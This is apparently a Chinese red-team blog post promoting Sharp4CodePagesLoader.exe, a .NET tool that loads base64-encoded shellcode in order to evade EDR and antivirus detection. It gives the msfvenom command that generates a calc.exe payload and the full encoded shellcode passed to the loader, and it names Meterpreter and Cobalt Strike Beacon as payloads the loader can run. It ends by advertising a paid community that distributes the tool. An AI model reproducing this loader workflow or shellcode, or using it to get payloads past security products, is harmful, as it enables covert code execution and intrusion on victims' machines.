绕过不是目的，执行才是关键 | .NET 通过 CodePage 加载 Shellcode 实现进程启动 - 新鲜讯息

随着 EDR、杀软对传统 PowerShell、MSBuild注入器的严密监控，红队/攻防人员迫切需要一种更冷门、更隐蔽的 shellcode 加载方式。在这样的背景下，Sharp4CodePagesLoader.exe 应运而生。该工具基于 .NET 平台，通过极低特征值的方式加载并执行 shellcode，有效绕过大多数安全产品的静态、行为与内存检测机制。

01. 工具基本介绍

Sharp4CodePagesLoader.exe 运行于 Windows .NET Framework 平台，加载并执行通过特殊编码处理的 Shellcode，比如 Meterpreter、Cobalt Strike Beacon，如下图所示。

02. 工具实战用法

Shellcode 使用 msfvenom 或其他工具生成，并通过 Base64 编码处理。例如以生成计算器为例：

msfvenom -p windows/exec CMD=calc.exe -f raw -o shellcode.bin

再将 shellcode 编码转换为 Base64，具体命令如下所示。

base64 shellcode.bin > payload.txt

最后，将 Base64 内容作为参数传递给 Sharp4CodePagesLoader，具体命令如下所示。

Sharp4CodePagesLoader.exe /OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA==

综上，Sharp4CodePagesLoader.exe 再次证明：在攻防对抗中，“冷门即免杀”。当主流手法都被封堵时，可以寻求其他的能力，反而能找到新的突破口。文章涉及的工具已打包在星球，感兴趣的朋友可以加入自取。

03.NET安全扩展学习

以上相关的知识点已收录于新书《.NET安全攻防指南》，全书共计25章，总计1010页，分为上下册，横跨.NET Web代码审计与红队渗透两大领域。

上册深入剖析.NET Web安全审计的核心技术，帮助读者掌握漏洞发现与修复的精髓；下册则聚焦于.NET逆向工程与攻防对抗的实战技巧，揭秘最新的对抗策略与技术方法。

04. 技术精华内容

从漏洞分析到安全攻防，我们涵盖了 .NET 安全各个关键方面，为您呈现最新、最全面的 .NET 安全知识，下面是公众号发布的精华文章集合，推荐大伙阅读！

05. 加入安全社区

目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最专业的技术知识库之一，超 1200+ 成员一起互动学习。星球主题数量近 600+，精华主题 230+，PDF文档和压缩包 300+ 。从Web应用到PC端软件应用，无论您是初学者还是经验丰富的开发人员，都能在这里找到对应的实战指南和最佳实践。